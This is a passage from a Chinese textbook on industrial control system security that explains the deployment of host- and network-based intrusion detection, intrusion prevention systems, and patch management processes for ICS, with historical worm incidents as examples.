在 HIDS 部署并配置完成之后,可以给主机系统提供更高级别的保护,但是将 HIDS 安装到企业的每一台主机上,设备成本和维护成本都是很高的,所以 HIDS 一般只安装在 关键主机上。 根据网络威胁原理,离被防护信息点越近,保护的作用就会越有效。由于 HIDS 部署 在被保护主机上,从空间上满足了网络安全的先决条件;同时,由于监听的是用户的整个 访问行为,所以 HIDS 可以有效地利用操作系统本身提供的功能,结合异常分析,准确报 告攻击行为,在时间上保证了网络安全进程实现的过程。 HIDS 和 NIDS 在很大程度上是互补的,许多机构的网络安全解决方案都同时采用了 基于主机和基于网络的入侵检测系统。实际上,许多用户在使用IDS 的同时配置了基于网 络的入侵检测系统,但不能保证检测,并能防止所有攻击,特别是一些加密包的攻击,而 网络中的 DNS 、E-mail 和 Web 服务器经常是被攻击的目标,而它们又必须与外部网络交 互,不可能对其进行全部屏蔽。因此,应当在各个服务器上安装基于主机的入侵检测系 统。此外,即便是小规模的网络结构,也常常需要基于主机和基于网络的入侵检测能力。 4. 混合部署 在部署一个基础的混合型入侵检测系统时,应把基于网络的入侵检测系统安装于网络 信息集中通过的地方,如中心交换机、集线器等,对所有通过的网络数据进行收集、分 析,并对攻击行为做出响应。同时,应把基于主机的入侵检测系统安装于受保护的主机 上,收集信息,对主机攻击行为做出响应。 联合使用基于主机和基于网络两种方式会达到更好的检测效果。例如,基于主机的 IDS 使用系统日志作为检测依据,因此在确定攻击是否已经取得成功时与基于网络的 IDS 相比具有更高的准确性。人们完全可以使用基于网络的IDS 提供早期报警,而使用基于主 机的IDS 来验证攻击是否取得成功。在下一代的入侵检测系统中,将把现在的基于网络和 基于主机这两种检测技术很好地集成起来,提供集成化的攻击签名、检测、报告和事件关 联功能。 此外,部署基于硬件的入侵检测系统应并联在网络中,通过旁路监听的方式实时地监 视网络中的流量,这样可以实现对网络的运行和性能无任何影响地判断其中是否含有攻击 企图,并通过各种手段向管理员报警,不但可以发现来自外部的攻击,也可以发现内部的 恶意行为。因此, IDS 能够形成网络安全的第二道闸门,是防火墙的必要补充。 小型网络的IDS 部署拓扑图如图9-7所示。网络安全由IDS 检测引擎、IDS 管理主机 两部分组成。IDS 检测引擎在检测到攻击时,能即刻做出响应,如进行告警/通知(向控 制台告警、向安全管理员发 E-mail、SNMP Trap、查看实时会话和通报其他控制台等), 记录现场(记录事件日志及整个会话),采取安全响应行动(终止入侵连接、调整网络设 备配置,如防火墙、执行特定的用户响应程序)。IDS 管理主机则可以接收实时报警,查 询引擎中的数据,进行统计分析。 服务器 服务器 图9-7 小型网络的入侵检测系统部署拓扑图 在大中型网络的安全建设中,应增设检测引擎中心机,如图9-8 所示。大中型网络的 拓扑结构复杂、地域分布广、数据流量大,需要使用多个引擎才能对整个网络进行监控。 为此专门增设一台检测引擎中心机,由它负责收集和保存各引擎检测到的数据,并进行二次分析,为管理员提供综合分析报告。当然,管理员的指令也可以通过检测引擎中心机自 动下发到各引擎中去执行,从而提高了管理效率。 内部网络1 内部网络2 内部网络N 图9-8 大中型网络入侵检测系统部署拓扑图 目前,大多数 IDS 产品由入侵检测引擎和管理控制台组成,在具体应用时可以根据网 络结构和需求做出不同的部署。 一般部署在需要重点保护的部位,如企业内部重要服务器 所在的子网,对该子网 IDS 发展趋势网中的所有连接进行监控。根据网络拓扑结构的不 同,入侵检测系统的监听端口可以接在共享介质的集线器或交换机的镜像端口 (SpanPort) 上,或者专为监听所增设的分接器 (Tap) 上。 9.3 入侵防护系统 IDS 一直以来充当了安全防护系统的重要角色,通过从网络上得到的数据包进行分 析,从而检测和识别出系统中的未授权或异常现象。其注重的是网络监控、审核跟踪、告 知网络是否安全,在发现异常行为时,自身不作为,通过与防火墙等安全设备联动的方式 进行防护, 虽然 IDS 是一种受到企业欢迎的解决方案,但其目前存在以下几个显著缺陷。 (1)网络缺陷。例如,用交换机代替可共享监听的 HUB, 使 IDS 的网络监听带来麻 烦,并且在复杂的网络下,构造与发送的数据包也可以绕过IDS 的监听。 (2)误报量大。只要一开机,报警不停。 (3)自身防攻击能力差等。 基于以上缺陷, IDS 还是不足以完成网络安全防护的重任。虽然入侵检测系统可以监 视网络传输并发出警报,但并不能拦截攻击。因此,IDS 不能适应用户的需要、不能提供 附加层面的安全,相反增加了企业安全操作的复杂性。入侵检测系统向入侵防护系统(Intrusion Prevention System,IPS)的方向发展已成必然。 IPS 能够对所有数据包进行仔细检查,立即确定是否许可或禁止访问。IPS 具有一些 过滤器,能够防止系统上各种类型的弱点受到攻击。当新的弱点被发现之后, IPS 就会创 建一个新的过滤器,并将其纳入自己的管辖之下,试探攻击这些弱点的任何恶意企图都会 立即受到拦截。IPS 技术能够对网络进行多层、深层、主动的防护以有效保证企业的网络 安全。IPS 的出现可谓是企业网络、控制系统网络安全的革命性创新。简单地说, IPS 等 于防火墙加上入侵检测系统,但并不代表 IPS 可以替代防火墙或 IDS 。防火墙在基于 TCP/IP 协议的过滤方面表现得非常出色, IDS 提供的全面审计资料对于攻击还原、入侵取 证、异常事件识别、网络故障排除等都有很重要的作用。 9.3.1 入侵防护系统的定义 IPS 是一种主动的、智能的入侵检测、防范、阻止系统,其设计旨在预先对入侵活动 和攻击性网络流量进行拦截,避免造成任何损失,而不是简单地在恶意流量传送时或传送 后才发出警报。它部署在网络的进出口处,当检测到攻击企图后,会自动将攻击包丢掉或 采取措施将攻击源阻断。 IPS 是一种智能化的入侵检测和防御产品,它不但能检测入侵的发生,而且能通过一 定的响应方式实时地终止入侵行为的发生和发展,实时地保护信息系统不受实质性的攻 击 。IPS 使得 IDS 和防火墙走向统一。防火墙是粒度比较粗的访问控制产品,它在基于 TCP/IP 协议的过滤方面表现出色,并且在大多数情况下,可以提供网络地址转换、服务 代理、流量统计等功能,甚至有的防火墙还能提供 VPN 功能。和防火墙比较起来, IPS 的功能比较单一,它只能串联在网络上,类似于通常所说的网桥式防火墙,对防火墙所不 能过滤的攻击进行过滤。这样一个两级过滤模式可以最大化地保证系统的安全。 IPS 技术的四大特征如下。 (1)只有以嵌入模式运行的IPS 设备才能实现实时的安全防护,实时阻拦所有可疑的 数据包。 (2)IPS 必须具有深入分析能力,以确定哪些恶意流量已经被拦截,根据攻击类型、 策略等来确定哪些流量应该被拦截。 (3)高质量的入侵特征库是IPS 高效运行的必要条件。 (4)IPS 必须具有高效处理数据包的能力。 9.3.2 入侵防护系统的分类 根据部署方式不同, IPS 可分为基于主机的入侵防护系统 (Host Intrusion Prevention System,HIPS)、 基于网络的入侵防护系统 (Network Intrusion Prevention System,NIPS) 及应用入侵防护 (Application Intrusion Prevention,AIP)3 种。 1. 基于主机的入侵防护系统 (HIPS) HIPS 序 。HIPS 入侵。 HIPS 通过在主机/服务器上安装软件代理程序,防止网络攻击入侵操作系统及应用程 可以根据自定义的安全策略及分析学习机制来阻断对服务器、主机发起的恶意 如图9-9 所示。HIPS 监视单个主机的特性和发生在主机内的可疑活动事件。 HIPS 在要监视的主机上安装传感器 (Sensor), 因此会影响主机的性能。 图9-9 基于主机的入侵防护系统图 从技术方面来看, HIPS 采用独特的服务器保护途径,利用包过滤、状态包检测和实 时入侵检测组成分层防护体系。这种体系能够在提供合理吞吐率的前提下,最大限度地保 护服务器的敏感内容,提供对主机的安全保护,也可以更改操作系统内核程序的方式,提 供比操作系统更加严谨的安全控制机制。 正因为 HIPS 工作在受保护的主机/服务器上,它不但能够利用特征和行为规则检测, 阻止如缓冲区溢出之类的已知攻击,还能够防范未知攻击,防止针对 Web 页面、应用和 资源的未授权的任何非法访问。HIPS 与具体的主机/服务器操作系统平台紧密相关,不同 的平台需要不同的软件代理程序。 2. 基于网络的入侵防护系统 (NIPS) NIPS 通过检测流经特定网段或设备的网络流量,提供对网络系统的安全保护。由于 它采用在线连接方式,所以一旦辨识出入侵行为,NIPS 就可以去除整个网络会话,而不 仅仅是复位会话。 NIPS 如图9-10所示。NIPS 传感器监视和分析一个或多个网段上的网络活动。 NIPS 必须基于特定的硬件平台,才能实现千兆级网络流量的深度数据包检测和阻断 功能。这种特定的硬件平台通常可以分为三类: 一是网络处理器;二是专用的 FPGA 芯 片;三是专用的ASIC 芯片。 Internet 路由器 传感器 防火墙 交换机 传感器 服务器 服务器 图9-10 基于网络的入侵防护系统图 从技术方面来看,NIPS 吸取了目前 NIDS 的所有成熟技术,包括特征匹配、协议分 析和异常检测。特征匹配是最应用广泛的技术,具有准确率高、速度快的特点。基于状 态的特征匹配不但检测攻击行为的特征,还要检查当前网络的会话状态,避免受到欺骗 攻击。 3. 应用入侵防护 (AIP) AIP 是 NIPS 的一个特例,它把基于主机的入侵防护扩展成为位于应用服务器之前的 网络设备。 AIP 被设计成一种高性能的设备,配置在应用数据的网络链路上,以确保用户 遵守设定好的安全策略,保护服务器的安全。由于 NIPS 工作在网络上,直接对数据包进 行检测和阻断,因此,与具体的主机/服务器操作系统平台无关。 9.3.3 入侵防护系统的原理 IPS 在检测方面的原理与 IDS 相同,但在阻止入侵方面的原理只有 IPS 具备。它首先 由信息采集模块实施信息收集,内容包括系统和网络的数据,以及用户活动的状态和行 为,然后利用模式匹配、协议分析、统计分析和完整性分析等技术手段,由信号分析模块 对收集到的有关系统、网络、数据及用户活动的状态和行为等信息进行分析,最后由反应 模块对采集、分析后的结果做出相应的反应。 真正的 IPS 与传统的 IDS 相比有两点关键区别:自动阻截和在线运行,两者缺一不 可。防护工具软/硬件方案必须设置相关策略,以自动对攻击做出响应,而不仅仅是在恶 意通信进入时向网络管理员发出告警,要实现自动响应,系统就必须在线运行。当黑客试 图与目标服务器建立会话时,所有数据都会经过 IPS 传感器, IPS 传感器位于活动数据路 径中,并检测数据流中的恶意代码,核对策略,在未转发到服务器之前将信息包或数据流阻截。由于是在线操作,因而能保证处理方法适当且可预知,从而达到防护的目的。入侵 防护系统模型如图9-11所示。 图9-11 入侵防护系统模型图 9.3.4 入侵防护系统的关键技术 1. 主动防御技术 对关键主机和服务的数据进行全面的强制性防护、对其操作系统进行加固,并对用户 权利进行适当限制,以达到保护驻留在主机和服务器上数据的效果。这种防范方式不仅能 够主动识别已知攻击方法,对于恶意的访问予以拒绝,而且能够成功防范未知攻击行为。 例如, 一个入侵者利用一个新的系统漏洞获得操作系统超级用户口令,下一步希望用这个 账户和密码对服务器上的数据进行删除和篡改,此时,若利用主动防范的方式首先限制了 超级用户的权限,然后通过访问地点、时间及所采用的应用程序等方面的因素予以限制, 入侵者的攻击企图就很难得逞,同时系统会将访问企图记录下来。 2. 防火墙和 IPS 联动技术 一方面,通过开放接口实现联动,即防火墙或 IPS 产品开放一个接口供对方调用,按 照一定的协议进行通信,传输警报。这种方式比较灵活,防火墙可以行使其第一层防御功 能——访问控制, IPS 系统可以行使其第二层防御功能——检测入侵,丢弃恶意通信,确 保该通信不能到达目的地,并通知防火墙进行阻断。这种方式不影响防火墙和 IPS 的性 能,对于两个系统自身的发展非常有利,但由于是两个系统的配合运作,所以要重点考虑 防火墙和IPS 联动的安全性。 另一方面,通过紧密集成实现联动,即把IPS 技术与防火墙技术集成到同一个硬件平 台上,在统一的操作系统管理下有序运行。所有通过该硬件平台的数据不仅要接受防火墙 规则的验证,还要被检测判断是否含有攻击,以达到真正的实时阻断。 3. 综合多种检测方法 IPS 可能引发误操作,阻塞合法的网络事件,从而导致数据丢失。为了避免这种情况 的发生,IPS 采用了多种检测方法,最大限度地正确判断已知攻击和未知攻击。其检测方 法包括误用检测和异常检测,增加状态信号、协议和通信异常分析功能,以及后门和二进 制代码检测。为解决主动性误操作,采用通信关联分析的方法,使 IPS 全方位识别网络环 境,减少错误告警。通过将琐碎的防火墙日志记录、IDS 数据、应用日志记录,以及系统弱点评估状况收集到一起,合理推断出将发生哪些情况,并做出适当响应。 4. 硬件加速系统 为了实现百兆、千兆,甚至更高级网络流量的深度数据包检测和阻断功能, IPS 必须 具有高效处理数据包的能力。因此, IPS 必须基于特定的硬件平台,采用专用硬件加速系 统来提高其运行效率。 第 1 0 章 工业控制系统补丁管理 10.1 补 丁 简 介 近二十年来,网络安全问题不断爆发,其主要表现在两个方面: 一方面,大范围互 联网攻击事件频繁发生,例如,2002 年全球的根域名服务器遭到大规模拒绝服务攻 击;另一方面,随着网络应用的逐步深入和大范围推广,这些网络攻击事件造成的危害 也越来越严重。2003 年 8 月 11 日 , 利 用 MS03-26 漏 洞 的 “ 冲 击 波 ” 蠕 虫 病 毒 (W32.Blaster.Worm) 开始在全世界范围内爆发,造成巨大的经济损失。在国内,两天 时间就使数千个局域网陷于瘫痪状态,受害者中既包括几十人的小规模企业,也有电 信、政府等大型企事业单位。 安全漏洞是这些网络安全问题的主要根源。据统计,几乎所有的网络攻击都是基于操 作系统或应用程序的漏洞进行的。如果用户能够根据具体的应用环境,尽可能早地通过网 络扫描来发现这些漏洞,并及时采取适当的处理措施进行修补,就可以有效地阻止入侵事 件的发生,但是在相应的漏洞补丁发布后,用户使用补丁程序更新系统往往不够及时。 一 方面是因为用户安全意识薄弱,往往要等到大规模的网络攻击开始时,才会想起安装补 丁;另 一 方面,即更重要的原因是,补丁管理工作本身也比较烦琐枯燥,以微软的 Windows 系统为例,每个星期都有漏洞警报和补丁程序发布,网络管理员不仅要追踪和应 用这些最新的升级信息,还要从中鉴别哪些补丁是必需且适用的。 值得注意的是,大部分危害发生在漏洞已经发布补丁后,由于更新不及时而造成。例 如,在微软发布 MS04-011 公告后的几小时内才出现了通用的攻击代码,如果能够及时进 行漏洞修复,由此漏洞造成的危害将不会存在。 因此,用户和软件开发商针对以上问题进行广泛合作,提出一些行之有效的补丁解决 方案,实现对操作系统和应用软件相关补丁的下载、检测及安装,确保补丁更新的及时 性,完全可以避免因为安全漏洞修补不及时而造成的损失。同时,进一步研究开发一些补 丁自动管理系统,支持多种组网方案的扩充,适应大规模网络的补丁分发。 10.1.1 补丁的定义 所谓补丁,是在原软件的基础上所做的修补程序,无法独立使用,要配合原软件才能 够使用。简单地说,就像衣服烂了就要打补丁一样,软件也需要,软件是人设计的,而人 的设计是有缺陷的,所以软件也就免不了会出现问题或漏洞,统称为 BUG, 而补丁是专门 为修复这些 BUG 做的,因为原来发布的软件存在缺陷,另外编制一个小程序使其完善。 通常,软件供应商对软件进行测试后投放市场,在使用过程中会出现干扰或有害于安 全的问题或错误,这些问题或错误一般由黑客或病毒设计者发现,或者是用户在使用过程 中产生的。这些问题或错误信息会反馈给软件供应商,软件开发人员进行纠正工作而发布 的解决问题的小程序就是补丁。 可以通过访问供应商的网站下载补丁。当然,供应商也会及时通知相关用户进行补丁 下载、安装和升级. 10.1.2 补丁的分类 补丁的作用是为了解决计算机中存在的漏洞,从而更好地优化计算机的性能。按照补 丁影响的大小可分为以下几类。 (1)“高危漏洞”的补丁。这些漏洞可能会被木马、病毒利用,应立即修复。 (2)软件安全更新的补丁。这些补丁用于修复一些流行软件的严重安全漏洞,建议立 即修复。 (3)可选的高危漏洞补丁。这些补丁安装后可能引起计算机和软件无法正常使用,应 谨慎选择。 (4)其他及功能性更新补丁。这些补丁主要用于更新系统或软件的功能,可根据需要 选择性安装。 (5)无效补丁。根据补丁失效原因的不同又可以细分为以下3类: ① 第一类是已过期补丁。这些补丁可能因为未及时安装,后又被其他补丁替代,无 须再安装。 ② 第二类是已忽略补丁。这些补丁在安装前进行检查,发现不适合当前的系统环 境,补丁软件智能忽略。 ③ 第三类是已屏蔽补丁。这些补丁因不支持操作系统或当前系统环境等原因被智能 屏蔽。 10.1.3 补丁的作用 补丁的作用可以概括为如下几点: (1)解决软件的漏洞或不完善的地方。在软件发行之后开发者对软件进一步完善,然 后发布补丁文件,有效解决软件系统在使用过程中暴露的问题。 (2)改进软件的性能。补丁不仅可以解决现有软件的漏洞或不完善的地方,而且可以 进一步改进软件的性能。 (3)提高系统的可靠性。补丁解决软件的漏洞和不完善的地方,改进软件的性能,最 终提高了整个系统的可靠性。 10.2 工业控制系统补丁概述 工业控制系统的操作系统在系统级普遍采用通用的商业操作系统,而在设备级采用实 时操作系统。同时,工业控制系统的应用软件运行在这些操作系统平台上。因此,工业控 制系统的补丁包括工业控制系统操作系统的补丁和工业控制系统应用软件的补丁。 为了理解工业控制系统补丁,下面将详细介绍工业控制系统补丁的定义和工业控制系 统补丁面临的问题,并对工业控制系统补丁与计算机系统补丁进行比较。 10.2.1 工业控制系统补丁的定义 工业控制系统补丁是为了解决工业控制系统的安全漏洞、可靠性或操作性问题而在原 有操作系统软件和应用软件的基础上所做的修补程序。 工业控制系统补丁也称为软件更新、软件升级、紧固件升级、服务包、热修复、基本 输入/输出系统 (Basic Input Output System,BIOS) 更新或其他软件更新。 10.2.2 工业控制系统补丁面临的问题 目前,工业控制系统补丁面临的是一个令资产所有者和工业控制系统供应商比较难以 处理的问题,主要表现在以下几个方面。 (1)许多工业控制系统使用者选择不打补丁。许多用户不想承担降低服务质量和增加 停机故障的风险,供应商反映他们发布的漏洞补丁只有10%的下载率。这些也证实了补丁 在工业控制领域的接受程度较低。 首先,用户对工业控制系统不打补丁的影响还没有正确认识。在一篇针对 OS 软件发 布后公开披露的漏洞补丁的重要研究中指出,有14.8%~24.4%的补丁是错误的并会直接 危害最终用户。更糟糕的情况是,这些错误的“解决方案”中有43%会导致系统崩溃、瘫 痪、资料损坏或其他安全问题。 其次,用户错误地认为工业控制系统不与外界联网而不需打补丁。即便是孤立的工业 控制系统,其本身也有漏洞或问题,供应商也会定期发布一些补丁,保证控制系统软件生 命周期内的安全可靠。因此,用户需要及时打补丁,解决这些漏洞或问题,提高控制系统 的可靠性。 最后,补丁管理意识严重缺乏。这是一个比较普遍的现象,在我国各行各业均应引起 重视。 (2)补丁并不总能依照其所设计的那样解决对应的安全问题。正如工业控制系统-计 算机应急响应小组 (ICS-CERT) 成 员 Kevin Hemsley 所言,在2011 年 ICS-CERT 发现, 通过打补丁来修复发布的控制系统产品漏洞出现了60%的失败率。 (3)并非所有漏洞都有对应的补丁。在2012年1月的 SCADA 信息安全技术研讨会 上有专家表示,在ICS-CERT 记录的364个公开漏洞中只有不到一半在当时有可用补丁。 有些人指责供应商无动于衷和懒惰,但其实有很多因素阻碍了补丁的及时发布。 2010年, ICS 的一家重要供应商告知,在产品的关键任务内部测试中已经发现了安全 隐患,但遗憾的是,这些漏洞嵌入在由第三方提供的 OS 软件中,现在 OS 提供商拒绝解 决这些问题,因此, ICS 供应商及其客户将面临无可用补丁的情况。 2011 年的案例涉及另一家 ICS 供应商, 一名独立的信息安全研究人员发现了 PLC 中的漏洞,并公开披露这些漏洞。该供应商开发了补丁准备撤除这些后门,但随即发 现这些后门被那些为用户提供检修服务的团队广泛使用,而让这个问题更加棘手的 是,这家公司产品变更的质保(QA) 程序需要4个月才能完成,这意味着即使用户愿 意为信息安全而放弃检修服务,仍需要接受4个月开放的空窗期等待正规的补丁测试流 程结束。 (4)对合法产品的补丁支持也有问题。 一个控制产品的生命周期一般为15~20 年, 而供应商为了适应市场的变化,其软件生命周期一般是5年左右。因此,用户会经常碰到 他们的产品不再获得供应商的补丁支持的情况,尽管他们在运行中发现了漏洞。 按计划发布的补丁是有效补丁,应对性的补丁是无效补丁,紧急发布的补丁是危险 补丁。 对任何控制系统而言,修补漏洞都是一项重要的进程;对良好的信息安全而言,修补 漏洞很关键,但是从 IT 应对策略角度来说,每月或每周不间断地打补丁对 SCADA 和 ICS 来说并不可行,匆忙打补丁更加危险。 工业控制系统供应商在尝试开发“紧急”补丁时会面临多个问题,如需要考虑安全因 素和质保要求,则通常会延迟补丁的发布。在有些情况下, 一个合理且安全的补丁也不起 作用。 工业控制系统的用户有类似顾虑。很坦白地讲,谁能因为不想增加系统故障或不想让 自己的关键控制器或服务器系统面临安全威胁而备受责怪呢? 对合法产品的补丁支持也有问题——许多人希望一个控制产品能够运行20 年,把它 运行得比典型的 IT 支持窗口还好。正如下面 Slammer 病毒攻击例子中提到的,打补丁可 能需要重要的人员帮助才能做到安全安装。 不要指望补丁能够迅速解决控制系统安全问题。如果用户的确是这样想的,则会发现 新出现的问题比修补的漏洞更糟糕。 其实,应用补丁是一个完整的安全系统的关键部分。据 US-CERT(美国计算机应急 响应小组)统计,大约95%的网络入侵可以通过为系统更新适当的补丁来避免,而如果用 户的控制系统从来不打补丁,那么将让自己的系统完全暴露在几十年的恶意软件前。 (5)即使是好的信息安全补丁也可能引起问题。 大多数的补丁需要关闭或重启正在运行的操作,有些可能也会中断或解除之前依靠控 制系统运行的功能。例如,某蠕虫病毒攻击的其中一个漏洞是系统 SQL 数据库的硬编码 密码。 与此同时,那些通过人为修改密码的客户则很快会发现,也多关键的控制功能都需 要这个密码才能进入。在这种情况下,所用的“解决方案”要比原来的“疾病”后果更 加严重。 (6)补丁管理比较混乱。有些用户依赖供应商的售后服务,也有些用户即便做了这方面工作,也未纳入常态管理。 10.2.3 工业控制系统补丁与 IT 系统补丁的比较 工业控制系统补丁在系统级与 IT 系统补丁相同,但在设备级与 IT 系统补丁完全 不同。 下面将通过打补丁的危险和影响、计划方式和专业人员支持三方面进行分析,明确工 业控制系统补丁与IT 系统补丁有明显不同。 (1)在商用网络里可以存在病毒,几乎每天都有新的补丁出现,计算机可能会死机、 暂停,而这些如果发生在控制网络里,所带来的危险和影响是不可想象的。 (2)计划性地打补丁是正确的,应对性地打补丁是错误的。不是说不要打补丁,恰恰 相反,给漏洞打补丁对控制系统良好的安全性非常重要。然而,像 IT 策略那样定期迅速 地、应对性地、不间断地打补丁并不适用于工业控制系统。 (3)给工业控制系统打补丁通常需要专家在场。关于打补丁还需要警惕的一 点是打补 丁的过程中需要有专门技能的人在场。举例来说,2003年1月 Slammer 病毒攻击的漏洞 其实原本有 一个在2002 年发布的补丁 (MS02-039), 遗憾的是,这并没有帮助一家在墨 西哥海湾拥有大量采油平台的公司逃过 一劫。这家公司在2002 年夏天开始打了补丁运 行,但服务器还是出现了问题,需要 Windows 专家在场打补丁,由于这些专家中只有极 少人具有进入采油平台的安全认证,因而在六个月后受到 Slammer 病毒攻击时还有许多平 台尚未打补丁。 10.3 工业控制系统补丁管理系统设计 工业控制系统补丁管理是现代工业控制系统信息安全的重要组成部分,是一个由资产 所有者和工业控制系统供应商共同协作完成的工作。因此,搭建合理的工业控制系统补丁 管理系统架构是当务之急。 工业控制系统补丁管理系统架构也是目前刚开始提出来的一种架构,理解和掌握这种 架构对做好工业控制系统信息安全是有帮助的。 10.3.1 工业控制系统补丁管理系统架构 在第3章中曾提及,防火墙带 DMZ 位于公司网与控制网间的架构图适合于补丁管理 服务器等的布置。 一个典型的工业控制系统补丁管理系统架构如图10-1所示。 图10-1 典型的工业控制系统补丁管理系统架构图 在这种架构中,公司网需要访问的设备放置在 DMZ, 控制网要求补丁管理服务器、抗 病毒服务器或其他安全服务器等必须放在 DMZ, 公司网与控制网没有直接的通信途径,防 火墙能够阻止任意来自公司网的数据包进入控制网 , 同时也能控制来自其他网络区的流量 。 通过计划好的规则集,能在控制网和其他网之间维持一个明确的界限。 安装和配置一个 DMZ, 提供了一面良好的屏障,可以阻止来自外部的直接攻击。设 计良好的 DMZ 可以强迫所有的通信都始于或终于 DMZ, 这样做的结果是使攻击者很难 与控制区直接通信。 补丁管理服务器提供非军事区域 (DMZ) 和工厂控制区域的相关设备的补丁管理, 这台服务器的设置能够有效解决目前工业控制系统面临的补丁问题,是工业控制系统信息 安全的重要组成部分。因此,补丁管理服务器会受到用户和供应商的欢迎。 补丁管理服务器中的补丁可以来自网络下载,也可以直接来自可信供应商的介质。注 意,供应商的介质必须经过防病毒扫描后才可以安装在补丁管理服务器。 补丁管理服务器中补丁的分发一般选择在工业控制系统维修时间的计划中。因为维修 时间的补丁分发和安装不会给工业生产造成不利影响,同时,工业用户维修人员有计划地 安 排 供 应 商 专 业 人 员 到 场 指 导 安 装 、 测 试 和 投 用 , 保 证 补 丁 的 正 确 实 施 。 10.3.2 工业控制系统补丁管理系统要求 工业控制系统补丁管理系统对工业控制系统资产用户和工业控制系统供应商都有一定 的要求。 工业控制系统资产用户和工业控制系统供应商之间的密切合作,是做好工业控制系统 补丁管理系统的基本要求。 1. 资产用户要求 工业控制系统补丁管理系统对工业控制系统资产用户的要求主要包括以下几点: (1)建立和维护工业控制系统所有电子设备的清单。 (2)建立和维护每个电子设备安装版本的准确记录。 (3)确定每个电子设备需要哪些升级和更新。 (4)确定哪些升级和更新获得产品供应商授权或与产品兼容。 (5)在生产环境下对部署补丁测试,确保补丁安装后不影响工业控制系统的可靠性和 可操作性。经测试成功的补丁是合格补丁。 (6)安排合格补丁的安装计划。 (7)定期更新电子设备清单的记录。 (8)每年识别控制系统因不加补丁的安全漏洞。 (9)实施补丁或相关措施,减少控制系统的安全漏洞。 2. 供应商要求 工业控制系统补丁管理系统对工业控制系统供应商的要求主要包括以下几点: (1)提供有关产品软件补丁政策的文件。 (2)提供合格的相关补丁,包括产品用到的操作系统制造商和第三方软件的安全 补丁。 (3)提供所有补丁清单及其批准状态。 (4)补丁发布后30天内通知资产用户并更新补丁清单。 10.3.3 工业控制系统补丁管理特性 工业控制系统补丁管理有及时性、严密性、持续性和平衡性四个特征,分述如下。 1. 及时性 工业控制系统补丁管理需要有很强的及时性。如果补丁管理工作晚于漏洞或不完善的 地方暴发,那么控制系统就有可能被攻击或系统出现可靠性/可操作性问题,造成机密信 息泄露或生产中断,由此造成企业经济的重大损失。 由于黑客技术的不断积累和发展,留给控制系统管理人员的时间会越来越少,在最短 的时间内安装补丁才可以保护企业机密或保证系统的可靠性/可操作性,同时可以使控制 系统免受各种病毒的侵袭,避免企业经济受到重大影响。 2. 严密性 工业控制系统补丁是工业控制系统供应商为了修补漏洞而制作的程序更改,迫于用户 的压力,供应商一般会在最短的时间内发布补丁。因此,补丁的测试就会减少,补丁的兼 容性很容易出问题。特别是针对系统底层的一些补丁,很容易导致应用不能正常运行,甚 至系统不能正常启动。除了补丁测试需要严密性以外,补丁的推广同样也需要严密的计 划,哪些系统设备需要安装补丁,什么时候开始安装,安装之前需要备份哪些数据,如何 制订应急方案都需要一个严密的计划。 3. 持续性 漏洞修补工作是一个长期的、持续性的工作。因为随着控制系统漏洞和不完善之处的 不断发现,针对漏洞和不完善之处的补丁也会持续不断地发布。因此,要求企业的维修管 理人员要时刻跟踪供应商的补丁公告和安全公司的安全公告。 4. 平衡性 补丁管理就是对变动的风险管理。 工业控制系统补丁是对工业控制系统的改变,而对工业控制系统的这些改变都需要管 理。 一个资产用户不能盲目地对进程控制环境配置新的补丁而不面临操作紊乱的风险。因 此,就需要资产用户精心地用政策措施和实践经验来平衡对控制系统的可靠性和安全性两 方面的需求。 10.3.4 工业控制系统补丁的管理范围与任务 工业控制系统补丁的管理范围包含向操作的计算机系统获取、测试和安装多补丁的系 统管理范围。 工业控制系统补丁的管理任务包括维护当前可用补丁信息、决定哪些补丁范围适用于 特定系统、保证补丁安装适当、测试安装后的系统和记录所有的相关规程。例如,根据公 认最佳实践而要求远程跨越不同环境的特定配置。 对于安装补丁、升级和策略的改变,若分别处理似乎是无害的,但可能会导致严重的 网络安全后果。安装失败会产生严重的危险。因此,应采取相应方法来决定新补丁漏洞的 相关性和临界点以使之减轻,同时,这些方法决定了补丁适用和不适用对维持目标安全等 级的影响。 10.4 工业控制系统补丁管理程序 前面提到工业控制系统面临的补丁问题,工业控制系统补丁管理对工业控制系统资产所 有者和供应商也提出一定的要求,建立一个工业控制系统补丁管理程序是很有必要的。 第10章 工业控制系统补丁管理 在 第 6 章 中 曾 提 出 控 制 系 统 文 件 安 全 及 软 件 补 丁 的 使 用 , 工 业 控 制 系 统 补 丁 管 理 是 工 业控制系统信息安全管理的重要组成部分 。 因此 , 建立一个工业控制系统补丁管理程序是 工业控制系统信息安全管理的要求 。 业界对工业控制系统补丁管理程序的研究和制定还在起步阶段 。 工业控制系统补丁管 理程序需要考虑工业控制系统的特性 、 用户对生产及环境的要求 。 本节仅介绍工业控制系 统补丁管理流程 , 供业内人士参考 , 在他们制定工业控制系统补丁管理程序时提供一定的 帮助 。 10.4.1 工业控制系统补丁管理程序概述 微 软 公 司 推 荐 企 业 的 IT 系 统 采 用 一 种 “ 四 步 法 ” 模 型 , 用 于 IT 系 统 补 丁 管 理 , 其 运 作 框 图 如 图 1 0 - 2 所 示 。 这 些 步 骤 包 括 以 下 四 步 : 1 Assess 2.Identify (评估) (确定) 3.Evaluate and Plan (评价) 图10-2 微软公司推荐的企业 IT 系统补丁管理运作框图 (1)评估。评估补丁实施的环境。 (2)确定。确定新的软件更新。 (3)评价。评价和计划软件更新部署。 (4)实施。部署软件更新。 基 于 微 软 公 司 推 荐 的 IT 系 统 补 丁 管 理 运 作 程 序 , 同时结合工业控制系统的特性 、 用户生产的要 求及对环境的要求 , 工业控制系统补丁管理流程如 图 1 0 - 3 所 示 , 其 补 丁 管 理 流 程 分 为 评 估 、 测 试 、 部 署 、 核实与报告 、 设备数据管理五个阶段 。 图10-3 工业控制系统补丁管理流程图 10.4.2 评估阶段 本阶段的目的是基于补丁对于工业控制环境和风险的影响,为如何确定补丁是否适用 提供程序性指导。 一般地,补丁评估阶段的流程包括补丁及漏洞监视、确定适用性、风险评估和确定安 装四个步骤,具体介绍如下。 (1)补丁及漏洞监视:用户定期与供应商沟通,整理出一个现有补丁或最近发布的补 丁清单。同时,用户对控制系统的漏洞进行统计并通知供应商。 (2)确定适用性:分析现有或最近发布的补丁是否适用于目前的控制系统,以及分析 现有或最近发布的补丁是否能减少控制系统的漏洞,由此判断补丁是适应的,才可进入下 一步评估。 (3)风险评估:如果前面一步分析该补丁是适用的,那么就必须考虑安装该补丁的风 险。这就需要考虑控制环境的冲击、控制系统的重要性及漏洞的紧迫性。资产用户可以自 己设置一些问题进行较详细的风险评估,同时需要控制系统管理员、信息安全人员、IT 人员、供应商、工程与操作人员共同参与。 